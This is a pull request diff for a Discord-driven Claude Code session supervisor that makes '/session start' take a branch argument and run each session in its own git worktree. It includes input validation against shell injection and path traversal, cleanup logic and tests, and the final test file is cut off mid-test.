### PR TITLE
feat(#154): /session start に branch 引数を必須化し git worktree 上で claude を起動

### DIFF
--- a/docs/bot-operations.md
+++ b/docs/bot-operations.md
@@ -30,9 +30,12 @@ claude-hub プロジェクトで運用している Discord Bot の役割分担�
 ## 運用シナリオ
 
 ### 通常作業（外部プロジェクト）
-1. Discord サーバの対象チャンネル（例 `#dev-tool`）で `/session start`
+1. Discord サーバの対象チャンネル（例 `#dev-tool`）で `/session start <branch>`（branch 引数は必須。Issue #154）
+   - 指定した branch 専用の git worktree（`<projectDir>/.claude/worktrees/<branch>`）を作成・再利用し、その中で claude を起動する
+   - 既存 branch → checkout で worktree 作成 / 未存在 branch → repo の default branch から派生して新規作成
+   - 同じ branch で再度 `/session start <branch>` すると既存 worktree を再利用（継続作業）
 2. 作成されたスレッドにメッセージを送信 → Channel-Supervisor が Claude Code に中継
-3. 終了時は `/session stop`
+3. 終了時は `/session stop`（worktree は削除されるが branch は repo に保持される）
 
 ### claude-hub 自体の修正
 1. Discord DM の `claudeHubExit` Bot を使用

--- a/supervisor/src/commands/session.ts
+++ b/supervisor/src/commands/session.ts
@@ -13,7 +13,18 @@ export function createSessionCommand() {
     .setName("session")
     .setDescription("Claude Code セッション管理")
     .addSubcommand((sub) =>
-      sub.setName("start").setDescription("セッションを起動")
+      sub
+        .setName("start")
+        .setDescription("セッションを起動（作業ブランチ専用の worktree で claude を起動）")
+        // Issue #154: branch is the working branch for this session. Declared
+        // optional at the Discord layer so a missing arg reaches the handler,
+        // which returns a migration hint (the old no-arg form is gone).
+        .addStringOption((opt) =>
+          opt
+            .setName("branch")
+            .setDescription("作業ブランチ名（例: feature-foo）")
+            .setRequired(false)
+        )
     )
     .addSubcommand((sub) =>
       sub
@@ -74,6 +85,19 @@ async function handleStart(
     return;
   }
 
+  // Issue #154 (Q6): branch is required; only an empty/whitespace value is
+  // blocked here — git validates the rest. The old no-arg `/session start` is
+  // gone, so guide the user to the new form.
+  const branch = interaction.options.getString("branch")?.trim() ?? "";
+  if (!branch) {
+    await interaction.reply({
+      content:
+        "❌ branch 引数が必須です。`/session start <branch-name>` が新仕様です（例: `/session start feature-foo`）。",
+      flags: 64,
+    });
+    return;
+  }
+
   if (sessionManager.count() >= MAX_SESSIONS) {
     const sessions = sessionManager.listRunning();
     const oldest = sessions.sort(
@@ -86,6 +110,10 @@ async function handleStart(
   }
 
   await interaction.deferReply();
+
+  // Tracked so a failure after thread creation (e.g. git worktree error) can
+  // clean up the orphan thread instead of leaving a dead "🟢 Session" thread.
+  let createdThread: ThreadChannel | null = null;
 
   try {
     // Count existing sessions in this channel
@@ -113,14 +141,19 @@ async function handleStart(
       name: threadName,
       autoArchiveDuration: 10080, // 7 days
     });
+    createdThread = thread;
 
-    // Start the session with the thread ID
-    const session = sessionManager.start(config, thread.id);
+    // Start the session with the thread ID — runs claude in a per-branch
+    // worktree (Issue #154).
+    const session = sessionManager.start(config, thread.id, branch);
 
     // Post welcome message in the thread
+    const locationLine = session.worktree
+      ? `📁 Worktree: \`${session.worktree.path}\`\n🌿 ブランチ: \`${session.worktree.branch}\``
+      : `📁 ディレクトリ: \`${config.dir}\``;
     await thread.send(
       `✅ **${config.displayName}** のセッションを開始しました\n\n` +
-        `📁 ディレクトリ: \`${config.dir}\`\n` +
+        `${locationLine}\n` +
         `📊 稼働中セッション: ${sessionManager.count()}/${MAX_SESSIONS}\n\n` +
         `このスレッドにメッセージを送信すると、Claude Code に中継されます。\n` +
         `終了するには \`/session stop\` をこのスレッド内で実行してください。`
@@ -130,6 +163,15 @@ async function handleStart(
       content: `✅ セッションをスレッドで起動しました → ${thread}`,
     });
   } catch (err) {
+    // Best-effort: drop the orphan thread so a failed start doesn't leave a
+    // misleading "🟢 Session" thread with no live session behind it.
+    if (createdThread) {
+      try {
+        await createdThread.delete();
+      } catch {
+        // Thread already gone or delete not permitted — nothing to recover.
+      }
+    }
     const msg = `❌ セッション起動に失敗: ${err instanceof Error ? err.message : String(err)}`;
     if (interaction.deferred || interaction.replied) {
       await interaction.editReply({ content: msg });

--- a/supervisor/src/session/adapters-fake.ts
+++ b/supervisor/src/session/adapters-fake.ts
@@ -4,7 +4,9 @@ import type {
   RelayServerAdapter,
   SessionEffects,
   TmuxAdapter,
+  WorktreeAdapter,
 } from "./adapters";
+import { resolveWorktreePath, type EnsureWorktreeResult } from "./worktree";
 import type { OpenTabOptions } from "./iterm2";
 
 /**
@@ -97,11 +99,39 @@ export class FakeProcessAdapter implements ProcessAdapter {
   }
 }
 
+export class FakeWorktreeAdapter implements WorktreeAdapter {
+  ensureCalls: { mainRepoDir: string; branch: string }[] = [];
+  removeCalls: { mainRepoDir: string; worktreePath: string }[] = [];
+  /** Worktree paths considered already-present (drives the Q4 reuse path). */
+  existingPaths = new Set<string>();
+  /** When set, ensure() throws to simulate a git worktree failure. */
+  failOnEnsure = false;
+
+  ensure(mainRepoDir: string, branch: string): EnsureWorktreeResult {
+    this.ensureCalls.push({ mainRepoDir, branch });
+    if (this.failOnEnsure) {
+      throw new Error("git worktree add failed");
+    }
+    // Use the real path resolver so the traversal / shell-injection guards are
+    // exercised through manager-level tests too (not just worktree.test.ts).
+    const path = resolveWorktreePath(mainRepoDir, branch.trim());
+    const reused = this.existingPaths.has(path);
+    this.existingPaths.add(path);
+    return { path, reused };
+  }
+
+  remove(mainRepoDir: string, worktreePath: string): void {
+    this.removeCalls.push({ mainRepoDir, worktreePath });
+    this.existingPaths.delete(worktreePath);
+  }
+}
+
 export interface FakeSessionEffects extends SessionEffects {
   tmux: FakeTmuxAdapter;
   iterm2: FakeItermAdapter;
   relayServer: FakeRelayServerAdapter;
   process: FakeProcessAdapter;
+  worktree: FakeWorktreeAdapter;
 }
 
 export function createFakeEffects(): FakeSessionEffects {
@@ -110,5 +140,6 @@ export function createFakeEffects(): FakeSessionEffects {
     iterm2: new FakeItermAdapter(),
     relayServer: new FakeRelayServerAdapter(),
     process: new FakeProcessAdapter(),
+    worktree: new FakeWorktreeAdapter(),
   };
 }

--- a/supervisor/src/session/adapters.ts
+++ b/supervisor/src/session/adapters.ts
@@ -15,6 +15,12 @@ import {
   TMUX_PATH,
   ensureSocketConfigured as realEnsureSocketConfigured,
 } from "./tmux";
+import {
+  ensureWorktree,
+  removeWorktree,
+  realGitGhRunner,
+  type EnsureWorktreeResult,
+} from "./worktree";
 
 /**
  * Adapters that wrap external side effects (tmux, iTerm2, relay HTTP server,
@@ -47,11 +53,24 @@ export interface ProcessAdapter {
   kill(pid: number, signal: NodeJS.Signals | number): void;
 }
 
+/**
+ * Per-branch git worktree management (Issue #154). Real impl delegates to
+ * {@link ./worktree} with the production git/gh runner; tests inject an
+ * in-memory fake so {@link SessionManager} unit tests never run git.
+ */
+export interface WorktreeAdapter {
+  /** Create or reuse the worktree for `branch` under `mainRepoDir`. */
+  ensure(mainRepoDir: string, branch: string): EnsureWorktreeResult;
+  /** Remove the worktree (branch is preserved). */
+  remove(mainRepoDir: string, worktreePath: string): void;
+}
+
 export interface SessionEffects {
   tmux: TmuxAdapter;
   iterm2: ItermAdapter;
   relayServer: RelayServerAdapter;
   process: ProcessAdapter;
+  worktree: WorktreeAdapter;
 }
 
 export const realTmuxAdapter: TmuxAdapter = {
@@ -131,9 +150,19 @@ export const realProcessAdapter: ProcessAdapter = {
   },
 };
 
+export const realWorktreeAdapter: WorktreeAdapter = {
+  ensure(mainRepoDir, branch) {
+    return ensureWorktree(mainRepoDir, branch, realGitGhRunner);
+  },
+  remove(mainRepoDir, worktreePath) {
+    removeWorktree(mainRepoDir, worktreePath, realGitGhRunner);
+  },
+};
+
 export const realSessionEffects: SessionEffects = {
   tmux: realTmuxAdapter,
   iterm2: realItermAdapter,
   relayServer: realRelayServerAdapter,
   process: realProcessAdapter,
+  worktree: realWorktreeAdapter,
 };

--- a/supervisor/src/session/manager.ts
+++ b/supervisor/src/session/manager.ts
@@ -126,6 +126,7 @@ export class SessionManager {
       relayServer:
         options.effects?.relayServer ?? realSessionEffects.relayServer,
       process: options.effects?.process ?? realSessionEffects.process,
+      worktree: options.effects?.worktree ?? realSessionEffects.worktree,
     };
     this.gracefulKillTimeoutMs =
       options.gracefulKillTimeoutMs ?? GRACEFUL_KILL_TIMEOUT_MS;
@@ -168,8 +169,13 @@ export class SessionManager {
 
   /**
    * Start a new session with tmux + iTerm2 + thread.
+   *
+   * Issue #154: when `branch` is given the session runs in a dedicated git
+   * worktree under `<config.dir>/.claude/worktrees/<branch>` instead of the
+   * channel's main worktree, isolating its working tree from other sessions on
+   * the same repo. Without a branch the behaviour is unchanged (cwd = config.dir).
    */
-  start(config: ChannelConfig, threadId: string): SessionInfo {
+  start(config: ChannelConfig, threadId: string, branch?: string): SessionInfo {
     if (this.sessions.size >= MAX_SESSIONS) {
       throw new Error(`最大セッション数 (${MAX_SESSIONS}) に達しています`);
     }
@@ -181,6 +187,25 @@ export class SessionManager {
     if (!existsSync(config.dir)) {
       throw new Error(
         `プロジェクトディレクトリが見つかりません: ${config.dir}`
+      );
+    }
+
+    // Issue #154: resolve the effective cwd. With a branch, create/reuse a
+    // worktree (Q1/Q2/Q4 in worktree.ts); failures propagate so the caller can
+    // report them rather than starting claude in the wrong directory.
+    let projectDir = config.dir;
+    let worktree: SessionInfo["worktree"];
+    const trimmedBranch = branch?.trim();
+    if (trimmedBranch) {
+      const result = this.effects.worktree.ensure(config.dir, trimmedBranch);
+      projectDir = result.path;
+      worktree = {
+        mainRepoDir: config.dir,
+        path: result.path,
+        branch: trimmedBranch,
+      };
+      console.log(
+        `[SessionManager] ${result.reused ? "Reusing existing worktree" : "Created worktree"} for branch '${trimmedBranch}': ${result.path}`
       );
     }
 
@@ -200,14 +225,14 @@ export class SessionManager {
     // that progress-relay.sh (PostToolUse hook) can locate it from $CWD without
     // dropping `.supervisor-relay-url` into every project repo (Issue #88).
     // The hook applies the same sanitisation logic to its `$CWD` payload.
-    const relayUrlFile = relayUrlFilePath(config.dir);
+    const relayUrlFile = relayUrlFilePath(projectDir);
     const relayUrlDir = dirname(relayUrlFile);
 
     // Best-effort cleanup of any stale relay-url file from a prior session for
     // this project. Without this, a Supervisor restart can leave a file pointing
     // at a dead relay port; PostToolUse hooks would then POST to a stale URL
     // and silently time out (curl --max-time 3 in progress-relay.sh).
-    this.cleanupRelayUrlFile(config.dir);
+    this.cleanupRelayUrlFile(projectDir);
 
     const claudeCmd = [
       "unset ANTHROPIC_API_KEY",
@@ -215,7 +240,7 @@ export class SessionManager {
       `export SUPERVISOR_RELAY_URL="${relayUrl}"`,
       `mkdir -p "${relayUrlDir}"`,
       `printf "%s" "${relayUrl}" > "${relayUrlFile}"`,
-      `cd "${config.dir}"`,
+      `cd "${projectDir}"`,
       `exec ${CLAUDE_PATH} ${buildClaudeFlags(config).join(" ")}`,
     ].join(" && ");
 
@@ -235,6 +260,12 @@ export class SessionManager {
     }
 
     if (!pid) {
+      // Claude failed to come up. Drop the relay-url file the in-tmux command
+      // may have written so a PostToolUse hook never POSTs to a dead port. The
+      // worktree (if any) is left in place — it is valid and gets reused on the
+      // next `/session start <branch>` (Q4); only an explicit /session stop
+      // removes it (Q3).
+      this.cleanupRelayUrlFile(projectDir);
       throw new Error(
         "Claude Code の起動に失敗しました（tmuxセッションのPID取得失敗）"
       );
@@ -245,12 +276,13 @@ export class SessionManager {
       id: sessionId,
       channelName: config.channelName,
       threadId,
-      projectDir: config.dir,
+      projectDir,
       pid,
       process: null as unknown as any, // tmux manages the process
       startedAt: now,
       lastActivityAt: now,
       status: "running",
+      worktree,
     };
 
     this.sessions.set(threadId, info);
@@ -259,7 +291,7 @@ export class SessionManager {
       id: sessionId,
       channel_name: config.channelName,
       thread_id: threadId,
-      project_dir: config.dir,
+      project_dir: projectDir,
       pid,
       claude_session_id: null,
       started_at: now.toISOString(),
@@ -279,7 +311,7 @@ export class SessionManager {
       this.effects.iterm2.openTab({
         tmuxSessionName: tmuxName,
         channelName: config.channelName,
-        projectDir: config.dir,
+        projectDir,
       });
     }, 0);
 
@@ -363,6 +395,32 @@ export class SessionManager {
     this.effects.iterm2.markTabStopped(session.channelName, tmuxName);
     updateSessionStatus(session.id, "stopped", reason);
     this.cleanupRelayUrlFile(session.projectDir);
+
+    // Issue #154 (Q3): remove the per-branch worktree on stop; the branch
+    // itself is preserved.
+    this.removeWorktreeBestEffort(session.worktree);
+  }
+
+  /**
+   * Remove a session's worktree, swallowing failures (Issue #154, Q3). A stuck
+   * worktree must never block session teardown, so a removal error is logged
+   * and ignored. No-op when the session had no worktree.
+   */
+  private removeWorktreeBestEffort(
+    worktree: SessionInfo["worktree"]
+  ): void {
+    if (!worktree) return;
+    try {
+      this.effects.worktree.remove(worktree.mainRepoDir, worktree.path);
+      console.log(
+        `[SessionManager] Removed worktree ${worktree.path} (branch '${worktree.branch}' preserved)`
+      );
+    } catch (err) {
+      console.warn(
+        `[SessionManager] Failed to remove worktree ${worktree.path}:`,
+        err
+      );
+    }
   }
 
   touchActivity(threadId: string): void {
@@ -413,6 +471,12 @@ export class SessionManager {
         if (session) {
           this.effects.iterm2.markTabStopped(session.channelName, tmuxName);
           this.cleanupRelayUrlFile(session.projectDir);
+          // Issue #154: the worktree is intentionally NOT removed here. An
+          // unexpected claude exit is not an explicit teardown — removing the
+          // worktree (git worktree remove --force) would discard any
+          // uncommitted work the user did not choose to drop. Only the explicit
+          // /session stop removes it (Q3); until then it is reused on restart
+          // of the same branch (Q4).
         }
         updateSessionStatus(sessionId, "stopped", "tmux_exited");
         this.clearWatcher(threadId);
@@ -434,6 +498,10 @@ export class SessionManager {
         }
       }
       this.cleanupRelayUrlFile(row.project_dir);
+      // Issue #154: worktrees are intentionally left in place on restart. They
+      // are reused on the next `/session start <branch>` (Q4) and force-removing
+      // them here would discard uncommitted work without an explicit teardown.
+      // Only /session stop removes a worktree (Q3).
       updateSessionStatus(row.id, "stopped", "supervisor_restart");
     }
   }

--- a/supervisor/src/session/manager.ts
+++ b/supervisor/src/session/manager.ts
@@ -396,9 +396,28 @@ export class SessionManager {
     updateSessionStatus(session.id, "stopped", reason);
     this.cleanupRelayUrlFile(session.projectDir);
 
-    // Issue #154 (Q3): remove the per-branch worktree on stop; the branch
-    // itself is preserved.
-    this.removeWorktreeBestEffort(session.worktree);
+    // Issue #154 (Q3): remove the per-branch worktree on stop; the branch is
+    // preserved. But Q4 allows multiple sessions to share one worktree (同
+    // branch 多重 session). `this.sessions` no longer contains the current
+    // thread (deleted above), so if any *other* running session still points
+    // at this worktree path, removing it would destroy that live session's
+    // cwd. Only the last session on the worktree removes it (PR #157 review,
+    // CodeRabbit Major).
+    if (session.worktree && !this.isWorktreePathInUse(session.worktree.path)) {
+      this.removeWorktreeBestEffort(session.worktree);
+    } else if (session.worktree) {
+      console.log(
+        `[SessionManager] Worktree ${session.worktree.path} still in use by another session; not removing`
+      );
+    }
+  }
+
+  /** True if a still-running session (other than the one just removed) uses this worktree path. */
+  private isWorktreePathInUse(worktreePath: string): boolean {
+    for (const s of this.sessions.values()) {
+      if (s.worktree?.path === worktreePath) return true;
+    }
+    return false;
   }
 
   /**

--- a/supervisor/src/session/types.ts
+++ b/supervisor/src/session/types.ts
@@ -4,6 +4,7 @@ export interface SessionInfo {
   id: string;
   channelName: string;
   threadId: string;
+  /** Effective claude cwd: the worktree path when started with a branch, else the channel dir. */
   projectDir: string;
   pid: number;
   process: ChildProcess;
@@ -11,6 +12,12 @@ export interface SessionInfo {
   startedAt: Date;
   lastActivityAt: Date;
   status: "running" | "stopping";
+  /**
+   * Set when the session runs in a per-branch git worktree (Issue #154,
+   * `/session start <branch>`). Removed on stop; `mainRepoDir` is the channel
+   * repo from which the worktree was created.
+   */
+  worktree?: { mainRepoDir: string; path: string; branch: string };
 }
 
 export type StopReason = "manual" | "idle_timeout" | "resource_limit" | "error" | "tmux_exited" | "supervisor_restart";

--- a/supervisor/src/session/worktree.ts
+++ b/supervisor/src/session/worktree.ts
@@ -187,19 +187,34 @@ export const realGitGhRunner: GitGhRunner = {
     } catch {
       // gh unavailable, not authenticated, or repo has no GitHub remote.
     }
-    // Fallback: local origin/HEAD if configured.
+    // Fallback: the default branch of a configured remote's HEAD. Prefer
+    // `origin`, but a fork / multi-remote checkout may name it differently
+    // (e.g. `upstream`), so fall back to the first remote (PR #157 review,
+    // gemini). The gh path above is already fork-safe; this only runs when gh
+    // is unavailable.
     try {
-      const ref = execFileSync(
-        "git",
-        ["-C", mainRepoDir, "symbolic-ref", "--short", "refs/remotes/origin/HEAD"],
-        { encoding: "utf8", stdio: ["ignore", "pipe", "ignore"] },
-      )
+      const remotes = execFileSync("git", ["-C", mainRepoDir, "remote"], {
+        encoding: "utf8",
+        stdio: ["ignore", "pipe", "ignore"],
+      })
         .toString()
-        .trim();
-      const prefix = "origin/";
-      if (ref.startsWith(prefix)) return ref.slice(prefix.length);
+        .split("\n")
+        .map((r) => r.trim())
+        .filter(Boolean);
+      const remote = remotes.includes("origin") ? "origin" : remotes[0];
+      if (remote) {
+        const ref = execFileSync(
+          "git",
+          ["-C", mainRepoDir, "symbolic-ref", "--short", `refs/remotes/${remote}/HEAD`],
+          { encoding: "utf8", stdio: ["ignore", "pipe", "ignore"] },
+        )
+          .toString()
+          .trim();
+        const prefix = `${remote}/`;
+        if (ref.startsWith(prefix)) return ref.slice(prefix.length);
+      }
     } catch {
-      // No origin/HEAD configured.
+      // No remote / no <remote>/HEAD configured.
     }
     return "main";
   },

--- a/supervisor/src/session/worktree.ts
+++ b/supervisor/src/session/worktree.ts
@@ -1,0 +1,241 @@
+import { execFileSync } from "child_process";
+import { existsSync } from "fs";
+import { resolve, sep } from "path";
+
+/**
+ * Per-branch git worktree management for supervisor sessions (Issue #154).
+ *
+ * `/session start <branch>` runs claude in a dedicated worktree under
+ * `<mainRepoDir>/.claude/worktrees/<branch>` instead of sharing the project's
+ * main worktree. This isolates a session's untracked files / stash from other
+ * work on the same repo. Worktrees are created on start and removed on the
+ * explicit `/session stop`; the branch itself is preserved (Discord brainstorm
+ * 2026-05-24, Q3).
+ *
+ * Design decisions (issue body):
+ *   Q1 existing branch  → `git worktree add <path> <branch>` (checkout)
+ *   Q2 unknown branch   → base = repo default branch, `git worktree add -b
+ *                          <branch> --no-track <path> <base>`
+ *   Q4 existing worktree → reuse as-is (idempotent, multi-session continue)
+ *
+ * Low-level git/gh calls go through {@link GitGhRunner} so the branching logic
+ * in {@link ensureWorktree} is unit-testable with an in-memory fake (no real
+ * git/gh). The real runner uses `execFileSync` with an argv array — never a
+ * shell string — so a branch name can never inject shell metacharacters
+ * (Q6 "git に任せる": validation is delegated to git, but the filesystem path
+ * is additionally guarded against traversal and shell-injection below).
+ */
+
+/** Subdirectory (relative to the main repo) that holds per-branch worktrees. */
+export const WORKTREE_SUBDIR = ".claude/worktrees";
+
+export interface GitGhRunner {
+  /** True if `branch` is an existing *local branch* in the repo at `mainRepoDir`. */
+  branchExists(mainRepoDir: string, branch: string): boolean;
+  /** Repo default branch (Q2 base for new branches). Falls back to "main". */
+  defaultBranch(mainRepoDir: string): string;
+  /** `git worktree add <worktreePath> <branch>` (existing branch, Q1). */
+  addWorktreeFromBranch(
+    mainRepoDir: string,
+    worktreePath: string,
+    branch: string,
+  ): void;
+  /** `git worktree add -b <branch> --no-track <worktreePath> <base>` (Q2). */
+  addWorktreeNewBranch(
+    mainRepoDir: string,
+    worktreePath: string,
+    branch: string,
+    base: string,
+  ): void;
+  /** `git worktree remove <worktreePath> --force` (Q3). */
+  removeWorktree(mainRepoDir: string, worktreePath: string): void;
+  /** Filesystem existence check for the worktree path (Q4 reuse). */
+  pathExists(path: string): boolean;
+}
+
+export interface EnsureWorktreeResult {
+  /** Absolute path of the worktree (claude cwd). */
+  path: string;
+  /** True when an existing worktree was reused (Q4) rather than created. */
+  reused: boolean;
+  /** Base branch used when a new branch was created (Q2); undefined otherwise. */
+  baseBranch?: string;
+}
+
+/**
+ * Reject branch names that are unsafe to embed in the downstream shell command.
+ *
+ * The worktree path is later interpolated into a double-quoted shell string
+ * (`cd "<path>"` in manager.ts, executed by tmux via `sh -c`). A branch
+ * containing `"`, `` ` ``, `$` or `\` would break out of the double quotes and
+ * allow command injection; a control character (e.g. a newline) would break
+ * the `&&` command chain. git forbids most of these in ref names, but the path
+ * is computed before git runs, so this is a necessary security boundary — not
+ * the general "let git validate" of Q6.
+ */
+function assertShellSafeBranch(branch: string): void {
+  for (let i = 0; i < branch.length; i++) {
+    const code = branch.charCodeAt(i);
+    const ch = branch[i];
+    if (code < 0x20 || ch === '"' || ch === "`" || ch === "$" || ch === "\\") {
+      throw new Error(`branch 名に使用できない文字が含まれています: ${branch}`);
+    }
+  }
+}
+
+/**
+ * Compute the worktree path for a branch and reject path traversal / unsafe
+ * names. `<mainRepoDir>/.claude/worktrees/<branch>`. Branch names containing
+ * `/` (e.g. `feat/foo`) map to nested directories, which is fine. A name that
+ * resolves outside the worktrees root (e.g. `../../etc`) is rejected.
+ */
+export function resolveWorktreePath(mainRepoDir: string, branch: string): string {
+  assertShellSafeBranch(branch);
+  const root = resolve(mainRepoDir, WORKTREE_SUBDIR);
+  const path = resolve(root, branch);
+  if (path === root) {
+    throw new Error(`branch 名が不正です（空または '.'）: ${branch}`);
+  }
+  if (!path.startsWith(root + sep)) {
+    throw new Error(`branch 名が不正です（path traversal）: ${branch}`);
+  }
+  return path;
+}
+
+/**
+ * Ensure a worktree exists for `branch`, creating it if necessary. Idempotent:
+ * an already-present worktree is reused (Q4), so calling this twice for the
+ * same branch is safe.
+ */
+export function ensureWorktree(
+  mainRepoDir: string,
+  branch: string,
+  runner: GitGhRunner,
+): EnsureWorktreeResult {
+  const trimmed = branch.trim();
+  if (!trimmed) {
+    throw new Error("branch 引数が必須です");
+  }
+  const worktreePath = resolveWorktreePath(mainRepoDir, trimmed);
+
+  // Q4: existing worktree → reuse.
+  if (runner.pathExists(worktreePath)) {
+    return { path: worktreePath, reused: true };
+  }
+
+  // Q1: existing local branch → checkout into a new worktree.
+  if (runner.branchExists(mainRepoDir, trimmed)) {
+    runner.addWorktreeFromBranch(mainRepoDir, worktreePath, trimmed);
+    return { path: worktreePath, reused: false };
+  }
+
+  // Q2: unknown branch → create from the repo's default branch.
+  const base = runner.defaultBranch(mainRepoDir);
+  runner.addWorktreeNewBranch(mainRepoDir, worktreePath, trimmed, base);
+  return { path: worktreePath, reused: false, baseBranch: base };
+}
+
+/** Remove a worktree (Q3). Caller decides whether failures are fatal. */
+export function removeWorktree(
+  mainRepoDir: string,
+  worktreePath: string,
+  runner: GitGhRunner,
+): void {
+  runner.removeWorktree(mainRepoDir, worktreePath);
+}
+
+/**
+ * Production {@link GitGhRunner}. Every git/gh invocation uses execFileSync
+ * with an argv array (no shell) so untrusted branch names are passed as a
+ * single literal argument and cannot inject shell metacharacters.
+ */
+export const realGitGhRunner: GitGhRunner = {
+  branchExists(mainRepoDir, branch) {
+    try {
+      // Restrict to local *branch* refs so revision expressions like `HEAD~1`
+      // or `@{-1}` are not mistaken for an existing branch (which would create
+      // a detached-HEAD worktree). exit 0 iff refs/heads/<branch> resolves.
+      execFileSync(
+        "git",
+        [
+          "-C",
+          mainRepoDir,
+          "show-ref",
+          "--verify",
+          "--quiet",
+          `refs/heads/${branch}`,
+        ],
+        { stdio: "ignore" },
+      );
+      return true;
+    } catch {
+      return false;
+    }
+  },
+  defaultBranch(mainRepoDir) {
+    // Primary: GitHub default branch (issue Q2). `:owner/:repo` is resolved by
+    // gh from the repo at cwd.
+    try {
+      const out = execFileSync(
+        "gh",
+        ["api", "repos/:owner/:repo", "--jq", ".default_branch"],
+        { cwd: mainRepoDir, encoding: "utf8", stdio: ["ignore", "pipe", "ignore"] },
+      )
+        .toString()
+        .trim();
+      if (out) return out;
+    } catch {
+      // gh unavailable, not authenticated, or repo has no GitHub remote.
+    }
+    // Fallback: local origin/HEAD if configured.
+    try {
+      const ref = execFileSync(
+        "git",
+        ["-C", mainRepoDir, "symbolic-ref", "--short", "refs/remotes/origin/HEAD"],
+        { encoding: "utf8", stdio: ["ignore", "pipe", "ignore"] },
+      )
+        .toString()
+        .trim();
+      const prefix = "origin/";
+      if (ref.startsWith(prefix)) return ref.slice(prefix.length);
+    } catch {
+      // No origin/HEAD configured.
+    }
+    return "main";
+  },
+  addWorktreeFromBranch(mainRepoDir, worktreePath, branch) {
+    // stderr is piped so a failure surfaces git's message in the thrown error.
+    execFileSync(
+      "git",
+      ["-C", mainRepoDir, "worktree", "add", worktreePath, branch],
+      { stdio: ["ignore", "pipe", "pipe"] },
+    );
+  },
+  addWorktreeNewBranch(mainRepoDir, worktreePath, branch, base) {
+    execFileSync(
+      "git",
+      [
+        "-C",
+        mainRepoDir,
+        "worktree",
+        "add",
+        "-b",
+        branch,
+        "--no-track",
+        worktreePath,
+        base,
+      ],
+      { stdio: ["ignore", "pipe", "pipe"] },
+    );
+  },
+  removeWorktree(mainRepoDir, worktreePath) {
+    execFileSync(
+      "git",
+      ["-C", mainRepoDir, "worktree", "remove", worktreePath, "--force"],
+      { stdio: ["ignore", "pipe", "pipe"] },
+    );
+  },
+  pathExists(path) {
+    return existsSync(path);
+  },
+};

--- a/supervisor/tests/commands/session-start-branch.test.ts
+++ b/supervisor/tests/commands/session-start-branch.test.ts
@@ -1,0 +1,156 @@
+import { test, expect, describe } from "bun:test";
+import { createSessionHandler } from "../../src/commands/session";
+
+/**
+ * Handler-level tests for the `/session start <branch>` migration (Issue #154).
+ *
+ * These build a minimal fake ChatInputCommandInteraction so we exercise the
+ * real handler logic without a Discord gateway. Focus:
+ *   - AC-4: a missing/empty branch is rejected before any thread or session is
+ *     created, with the migration hint.
+ *   - the branch value is forwarded to SessionManager.start.
+ */
+
+interface ReplyRecord {
+  kind: "reply" | "editReply";
+  content?: string;
+  flags?: number;
+}
+
+function makeInteraction(opts: {
+  branch?: string | null;
+  channelName?: string;
+  onThreadCreate?: () => void;
+  startImpl?: (...args: unknown[]) => unknown;
+}) {
+  const replies: ReplyRecord[] = [];
+  const startCalls: unknown[][] = [];
+  let threadCreated = false;
+
+  let threadDeleted = false;
+  const thread = {
+    id: "thread-xyz",
+    send: async () => {},
+    delete: async () => {
+      threadDeleted = true;
+    },
+  };
+
+  const channel = {
+    isThread: () => false,
+    isTextBased: () => true,
+    isDMBased: () => false,
+    name: opts.channelName ?? "agent-base",
+    threads: {
+      create: async () => {
+        threadCreated = true;
+        opts.onThreadCreate?.();
+        return thread;
+      },
+    },
+  };
+
+  const interaction = {
+    options: {
+      getSubcommand: () => "start",
+      getString: (name: string) =>
+        name === "branch" ? opts.branch ?? null : null,
+    },
+    channel,
+    deferred: false,
+    replied: false,
+    async reply(msg: { content?: string; flags?: number }) {
+      this.replied = true;
+      replies.push({ kind: "reply", content: msg.content, flags: msg.flags });
+    },
+    async deferReply() {
+      this.deferred = true;
+    },
+    async editReply(msg: { content?: string }) {
+      replies.push({ kind: "editReply", content: msg.content });
+    },
+  };
+
+  const sessionManager = {
+    count: () => 0,
+    listRunningByChannel: () => [],
+    start: (...args: unknown[]) => {
+      startCalls.push(args);
+      return (
+        opts.startImpl?.(...args) ?? {
+          worktree: {
+            mainRepoDir: "/Users/x/agent-base",
+            path: "/Users/x/agent-base/.claude/worktrees/feature-foo",
+            branch: "feature-foo",
+          },
+        }
+      );
+    },
+  };
+
+  return {
+    run: () =>
+      createSessionHandler(sessionManager as never)(interaction as never),
+    replies,
+    startCalls,
+    get threadCreated() {
+      return threadCreated;
+    },
+    get threadDeleted() {
+      return threadDeleted;
+    },
+  };
+}
+
+describe("/session start branch validation (#154)", () => {
+  test("AC-4: no branch → ephemeral migration error, no thread, no session", async () => {
+    const h = makeInteraction({ branch: null });
+    await h.run();
+
+    expect(h.startCalls).toHaveLength(0);
+    expect(h.threadCreated).toBe(false);
+    expect(h.replies).toHaveLength(1);
+    expect(h.replies[0]!.kind).toBe("reply");
+    expect(h.replies[0]!.flags).toBe(64); // ephemeral
+    expect(h.replies[0]!.content).toContain("branch 引数が必須");
+    expect(h.replies[0]!.content).toContain("/session start <branch-name>");
+  });
+
+  test("AC-4: whitespace-only branch is also rejected", async () => {
+    const h = makeInteraction({ branch: "   " });
+    await h.run();
+    expect(h.startCalls).toHaveLength(0);
+    expect(h.threadCreated).toBe(false);
+  });
+
+  test("forwards the trimmed branch to SessionManager.start", async () => {
+    const h = makeInteraction({ branch: "  feature-foo  " });
+    await h.run();
+
+    expect(h.startCalls).toHaveLength(1);
+    // start(config, threadId, branch)
+    expect(h.startCalls[0]![2]).toBe("feature-foo");
+    expect(h.threadCreated).toBe(true);
+  });
+
+  test("deletes the orphan thread and reports the error when start fails", async () => {
+    const h = makeInteraction({
+      branch: "feature-foo",
+      startImpl: () => {
+        throw new Error("git worktree add failed");
+      },
+    });
+    await h.run();
+
+    // Orphan thread cleaned up (no dead "🟢 Session" thread left behind).
+    expect(h.threadCreated).toBe(true);
+    expect(h.threadDeleted).toBe(true);
+
+    // Error surfaced to the user via the deferred editReply path.
+    const editReplies = h.replies.filter((r) => r.kind === "editReply");
+    expect(editReplies.length).toBeGreaterThan(0);
+    expect(editReplies[editReplies.length - 1]!.content).toContain(
+      "セッション起動に失敗"
+    );
+  });
+});

--- a/supervisor/tests/session/manager.test.ts
+++ b/supervisor/tests/session/manager.test.ts
@@ -361,6 +361,25 @@ describe("SessionManager worktree integration (#154)", () => {
     expect(effects.worktree.removeCalls).toHaveLength(0);
   });
 
+  test("Q4: two sessions share one worktree → only the last stop removes it", async () => {
+    // 同 branch 多重 session (AC-3 / Q4): both sessions reuse the same worktree.
+    const s1 = manager.start(config, "thread-share-1", "feature-foo");
